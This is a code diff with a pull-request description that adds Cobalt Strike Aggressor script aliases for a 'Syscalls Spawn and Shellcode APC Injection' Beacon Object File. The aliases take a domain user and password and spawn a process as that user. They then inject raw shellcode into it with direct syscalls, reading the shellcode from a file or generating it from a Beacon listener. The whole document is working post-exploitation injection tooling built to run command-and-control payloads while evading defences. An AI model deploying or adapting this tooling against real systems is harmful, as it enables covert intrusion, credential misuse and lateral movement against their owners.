+	$sc_data = readb($sc_handle, -1);
+	closef($sc_handle);
+
+	# pack our arguments
+	$args = bof_pack($1, "bZZZZ", $sc_data, $domain, $user, $pass, $exe);
+	
+	btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)");	
+	btask($1, "Reading shellcode from: $+  $2 and spawning as $domain" . "\\" . "$user");
+
+	# execute it.
+	beacon_inline_execute($1, $data, "go", $args);
+}
+
+alias static_syscalls_apc_user_spawn {
+	local('$handle $data $args $domain $user $pass $exe');
+
+        # parse arguments
+        # $2 = listener
+        # $3 = Domain\User
+        # $4 = password
+        # $5 = executable path
+
+        ($domain, $user) = split('\\\\', $3);
+        $pass            = $4;
+        
+        # Escapes single '\' with '\\' so entry.c parses correctly
+        $exe             = strrep($5, '\\', '\\\\');
+     
+        blog($1, "Spawning and injecting into $exe as $domain" . "\\" . "$user");
+	
+	# figure out the arch of this session
+	$barch  = barch($1);
+
+	# read in the right BOF file
+	$handle = openf(script_resource("syscallsapcuserspawn. $+ $barch $+ .o"));
+	$data = readb($handle, -1);
+	closef($handle);
+
+        if (size(@_) <= 4) {
+        	berror($1, "Not enough arguments.");
+                return;
+        } 
+
+	if (listener_info($2) is $null) {
+		berror($1, "Could not find listener $2");
+	}
+	else {
+		$sc_data = artifact_payload($2, "raw", "x64");
+
+		# pack our arguments
+		$args = bof_pack($1, "bZZZZ", $sc_data, $domain, $user, $pass, $exe);
+
+		btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)");
+		btask($1, "Using $+  $2  $+ listener for beacon shellcode generation.");
+
+		# execute it.
+		beacon_inline_execute($1, $data, "go", $args);
+	}
+}


### PR DESCRIPTION
Added BOFs/StaticSyscallsAPCUserSpawn/

Modified the .cna and entry.c slightly to accommodate CreateProcessWithLogonW. Thought it would be cool to emulate the native `spawnas` functionality, but use the direct syscalls for the injection.

Rather than add onto existing apc_spawn, I created separate static_syscalls_apc_user_spawn/shspawn, so the syntax doesn't become too cumbersome with the original. Let me know what you think.

No changes to Syscalls.h/beacon.h from the original.